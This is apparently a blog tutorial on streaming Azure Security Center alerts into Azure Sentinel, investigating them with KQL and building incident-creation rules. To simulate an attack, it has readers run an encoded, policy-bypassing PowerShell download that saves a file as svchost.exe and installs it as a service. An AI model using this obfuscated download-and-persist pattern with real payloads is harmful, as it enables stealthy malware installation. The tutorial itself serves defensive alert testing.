During Microsoft Ignite in November 2021, Azure Security Center and Azure Defender are now called Microsoft Defender for Cloud. They’ve also renamed Azure Sentinel to Microsoft Sentinel.
In this article, I will show you how to connect Azure Security Center to Azure Sentinel to stream security alerts and use Kusto Query Language (KQL) to investigate an alert, and finally, I will show you how to create an analytic rule that creates incidents automatically based on alerts generated in Azure Security Center.
Table of Contents
Introduction
Azure Security Center is a security management tool that allows you to gain insight into your security state across hybrid cloud workloads, reduce your exposure to attacks, and respond to detected threats quickly. Azure Security Center (ASC) has two main value propositions:
1) Cloud Security Posture Management (CSPM) – Help you prevent misconfiguration to strengthen your security posture for all different types of cloud workloads and resources in Azure (IaaS, PaaS, and SaaS).
2) Cloud Workload Protection Platform (CWPP) – Protect against threats for servers whether they are running in Azure, on-premises, or different clouds such as Amazon AWS or Google GCP, in addition to cloud-native workloads such as Web Apps, Kubernetes, Key Vaults, as well as for SQL databases (PaaS/VM) and storage accounts.
Microsoft Azure Sentinel is a cloud-native Security Information Event Management (SIEM) and Security Orchestration Automated Response (SOAR) solution. Azure Sentinel delivers intelligent security analytics and threat intelligence across the enterprise, providing a single solution for alert detection, threat visibility, proactive hunting, and threat response.
If you have Azure Security Center enabled in your subscription, then you can start ingesting the Security Alerts generated by the Security Center to Azure Sentinel, which provides a rich set of threat detections. Security Center will generate alerts according to different resource types:
- Alerts for IaaS Windows and Linux machines, as well as for non-Azure machines running on-premises or in other clouds.
- Alerts for Azure App Service.
- Alerts for Azure containers.
- Alerts for SQL Database and SQL Data Warehouse.
- Alerts for Azure Storage.
- Alerts for Cosmos DB.
- And much more…
Prerequisites
To follow this article, you need to have the following:
1) Microsoft Azure subscription. If you don’t have an Azure subscription, you can create a free one here.
2) Log Analytics Workspace – To create a new workspace, follow the instructions in Create a Log Analytics workspace.
3) Azure Security Center – Standard Tier enabled. Please note that you can use the standard tier free for 30 days.
- A virtual machine running on Azure or on-premises with the Microsoft Monitoring Agent (MMA) agent installed and in a healthy state. Check the following article to learn more on how to onboard Windows machines to Security Center.
4) Azure Sentinel enabled and connected to the Log Analytics workspace.
Connect Azure Security Center
Assuming you have all the prerequisites in place, follow the instructions below to stream your security alerts from Azure Security Center into Azure Sentinel:
1) Open Azure Portal and sign in with a user who has (contributor) privileges for the workspace on which Azure Sentinel is enabled as well as the resource group.
2) Under the All services option, type Sentinel, and click Azure Sentinel, as shown in the screenshot below.
3) On the Azure Sentinel workspaces blade, click in the workspace that you created earlier.
4) When the Azure Sentinel – Overview dashboard opens, click Data Connectors under Configuration in the left navigation pane.
5) In the Search by name or provider field, start typing Azure Security Center, and then click on Azure Security Center. Then click on the Open connector page as shown in the screenshot below.
6) The full Azure Security Center connector page appears, under the Configuration section, next to the subscription name that has the Azure Security Center standard tier enabled, click Connect as shown in the screenshot below. You can connect to more than one subscription if you want. Please note that all subscriptions which have Azure Security Center standard tier enabled will show under the Subscription list.
7) The Connection Status will temporarily appear as Connecting…, and once it is finished, it will appear as Connected as shown in the screenshot below.
8) After confirming that it is connected, you can close the Azure Security Center page, and on the Data Connectors page, click Refresh; you will see that the Azure Security Center connector status appears as Connected as shown in the screenshot below.
At this point, all security alerts that are triggered in Azure Security Center will appear in Azure Sentinel.
Investigating alerts in Azure Sentinel
To simulate an alert in Security Center and investigate it in Azure Sentinel, I will run a series of commands within the virtual machine guest OS assuming that the attacker has already compromised the system.
Logon to the VM, open a command prompt (cmd) with administrative privileges, and run the following set of commands:
mkdir c:\temp
powershell -nop -exec bypass -EncodedCommand "cABvAHcAZQByAHMAaABlAGwAbAAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJgAgAHsAIABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBkAG8AdwBuAGwAbwBhAGQALgBzAHkAcwBpAG4AdABlAHIAbgBhAGwAcwAuAGMAbwBtAC8AZgBpAGwAZQBzAC8AUwB5AHMAbQBvAG4ALgB6AGkAcAAgAC0ATwB1AHQARgBpAGwAZQAgAGMAOgBcAHQAZQBtAHAAXABzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIAB9ACIA"
sc.exe create "svvchost" binpath= "c:\temp\svchost.exe"
sc.exe start svvchost
The intent of this command is to simulate the download of a file from an external location and save it in the local folder with a different name. The -EncodedCommand parameter is to encode a string into base64. The string is the path to download a file from an external site and save it locally under C:\temp and the file that will be downloaded is Sysmon (System Monitor) tool by Sysinternals.
By the time you finish running the commands above, you should have a sequence of alerts in Security Center | THREAT PROTECTION | Security alerts similar to the one below. This is where Azure Security Center behavioral analytics has its high value since it will detect known patterns to discover malicious behavior.
Switch back to Azure Sentinel – Overview dashboard opens, click Data Connectors under Configuration in the left navigation pane, and then click on Azure Security Center. You will see now the data and log received as shown in the screenshot below.
Next, you need to access the workspace from Azure Sentinel and perform some queries using Kusto Query Language (KQL).
Within the same Azure Sentinel – Overview dashboard, under General click Logs.
On the Logs page under New Query 1*, type SecurityAlert and then click the Run button. You should see all security alerts that were performed and collected in the last 24 hours (which is the default time frame). The result should look similar to the image below.
To narrow the search to look only for activities that are related to VM creation, type the query below and click Run. This query will list all alerts generated by Azure Security Center where the alert name contains the keyword “suspicious”.
SecurityAlert | where AlertName contains "suspicious"
If you click and open any of the results and then expand the ExtendedProperties, you will see the full details where you can investigate further and understand the behavior of this suspicious command line. The results should be similar to the screenshot below:
If you want to get started with Kusto Query Language (KQL), I highly recommend bookmarking the new official page for KQL quick reference guide.
If you want additional guided examples on how to simulate and investigate alerts in Azure Security Center and Azure Sentinel, I highly recommend to check the following Threat Hunting Playbooks published by Microsoft.
Create an incident from alerts
After you have connected the Azure Security Center data source to Azure Sentinel, you want to be notified when something suspicious happens. To help you to do this, Azure Sentinel lets you create advanced alert rules that generate incidents that you can assign and investigate.
Please note that alerts triggered in Microsoft security solutions connected to Azure Sentinel, such as Azure Security Center, Microsoft Cloud App Security, and Azure Advanced Threat Protection (ATP), do not automatically create incidents in Azure Sentinel. By default, when you connect a Microsoft security solution to Azure Sentinel, any alert generated in that service will be stored as raw data in Azure Sentinel, in the Security Alert table in your Azure Sentinel workspace. You can then use that data like any other raw data you connect into Sentinel.
For this example, I will create Azure Sentinel incidents automatically from high-severity Azure Security Center alerts. You can also follow the same process to create incident rules based on medium and low severity alerts.
Assuming you have all the prerequisites in place, take now the following steps.
1) Open Azure Portal and sign in with a user who has (contributor) privileges for the workspace on which Azure Sentinel is enabled as well as the resource group.
2) Under the All services option, type Sentinel, and click Azure Sentinel.
3) Select the desired Log Analytics workspace, once Azure Sentinel – Overview dashboard opens, click Analytics under Configuration in the left navigation pane to see the ‘Active rules‘ as shown in the below screenshot.
4) In the Analytics page, select the ‘Rule templates‘ tab to see all of the built-in analytic rules, and then in the ‘Search’ field type ‘Azure Security Center‘ as shown in the below screenshot.
5) Choose ‘Create incidents based on Azure Security Center alerts‘ with severity ‘High‘, click on ‘+ Create‘, and then select ‘Microsoft incident creation rule‘ as shown in the below screenshot.
6) In the ‘Analytic rule wizard – Create new rule‘ page, enter the name and description under the ‘Analytic rule details‘ section and make sure the status is set to ‘Enabled‘, and then under ‘Analytic rule logic‘ section, select ‘Azure Security Center‘ as the Microsoft security service, and then choose ‘Custom‘ as filter by severity and select ‘High‘, you can adjust the rule logic and severity based on your needs, you can also ‘Include‘ and ‘Exclude‘ specific alerts if you want. When ready click ‘Next: Review >‘ to continue.
7) In the ‘Review and create‘ page review your settings and then click ‘Create‘.
Once the analytic rule is saved successfully, it will be visible under the ‘Active rules‘ tab.
Validate auto incidents creation
Once the custom analytic rule is created, you can simulate and create a new alert in Security Center as described in the previous section.
Once the alert is triggered, you can visualize it on Azure Sentinel | Incidents page as shown in the below screenshot, and then proceed with the investigation and assignment.
That’s it there you have.
How it works…
You can use the built-in rules available in Azure Sentinel to choose which connected Microsoft security solutions should create Azure Sentinel incidents automatically in real-time. You can also edit the rules to define more specific options for filtering which of the alerts generated by the Azure Security Center should create incidents in Azure Sentinel.
Please note that you can also enable incident generation automatically during the data source connection process to Azure Sentinel as shown below.
When you connect Azure Security Center or other Microsoft security solutions, you can select whether you want the alerts from the security solution to automatically generate incidents on Azure Sentinel | Incidents page.
Pricing
Before connecting data sources to Azure Sentinel, it is important to understand the potential costs of doing so. The following range of Microsoft generated logs and alerts can be ingested into both Azure Sentinel and Azure Monitor Log Analytics free of charge including Azure Security Center:
- Azure Activity Logs
- Office 365 Audit Logs including all SharePoint activity and Exchange admin activity
- Alerts from Microsoft Threat Protection products: Azure Security Center, Office 365 ATP, Azure ATP, Microsoft Defender ATP, Microsoft Cloud App Security, and Azure Information Protection.
Please note that Azure Active Directory (AAD) audit data is not free and is billed for ingestion into both Azure Sentinel, and Azure Monitor Log Analytics.
For full details of Azure Sentinel pricing including ingestion and storage costs, please check the official pricing page here.
Summary
As you have seen in this article, connecting Azure Security Center to Azure Sentinel will give you more insight into your organization’s network and system by viewing dashboards, you can create custom alerts, run automated playbooks and further investigate any suspicious activity. To learn more about Azure Security Center, check the official documentation from Microsoft.
The power of Azure Sentinel comes from the ability to detect, investigate, and remediate threats. To do this, you must first ingest data in the form of alerts from different security providers, such as Azure Security Center or other Microsoft solutions, as well as other third-party solutions. To learn more about Azure Sentinel, check the official documentation from Microsoft.
So why not connect Azure Security Center to Azure Sentinel free of charge?
__
Thank you for reading my blog.
If you have any questions or feedback, please leave a comment.
-Charbel Nemnom-
